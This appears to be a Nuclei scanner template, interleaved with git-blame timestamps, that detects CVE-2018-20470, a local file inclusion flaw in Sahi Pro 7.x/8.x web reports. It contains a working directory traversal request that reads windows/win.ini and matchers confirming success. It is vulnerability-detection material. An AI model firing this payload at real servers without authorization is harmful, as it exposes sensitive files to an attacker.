2021-08-02 23:19:42 +00:00
id : CVE-2018-20470
info :
2022-06-13 19:36:01 +00:00
name : Tyto Sahi pro 7.x/8.x - Local File Inclusion
2021-08-02 23:19:42 +00:00
author : daffainfo
severity : high
2022-06-20 16:20:58 +00:00
description : |
Tyto Sahi Pro versions through 7.x.x and 8.0.0 are susceptible to a local file inclusion vulnerability in the web reports module which can allow an outside attacker to view contents of sensitive files.
2021-08-19 13:59:12 +00:00
reference :
2021-08-02 23:19:42 +00:00
- https://barriersec.com/2019/06/cve-2018-20470-sahi-pro/
2022-05-17 09:18:12 +00:00
- http://packetstormsecurity.com/files/153330/Sahi-Pro-7.x-8.x-Directory-Traversal.html
2022-06-13 19:36:01 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2018-20470
2021-09-10 11:26:40 +00:00
classification :
2023-02-01 20:14:44 +00:00
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
2022-04-22 10:38:41 +00:00
cvss-score : 7.5
2021-09-10 11:26:40 +00:00
cve-id : CVE-2018-20470
cwe-id : CWE-22
2022-08-27 04:41:18 +00:00
tags : cve,cve2018,lfi,packetstorm
2021-08-02 23:19:42 +00:00
requests :
- method : GET
path :
- "{{BaseURL}}/_s_/dyn/Log_highlight?href=../../../../windows/win.ini&n=1#selected"
matchers-condition : and
matchers :
2022-06-20 16:20:58 +00:00
2021-08-02 23:19:42 +00:00
- type : word
2022-06-20 16:20:58 +00:00
part : body
2021-08-02 23:19:42 +00:00
words :
- "bit app support"
- "fonts"
- "extensions"
condition : and
2022-06-13 19:36:01 +00:00
2022-06-20 16:20:58 +00:00
- type : status
status :
- 200
2022-06-17 16:30:43 +00:00
# Enhanced by mp on 2022/06/17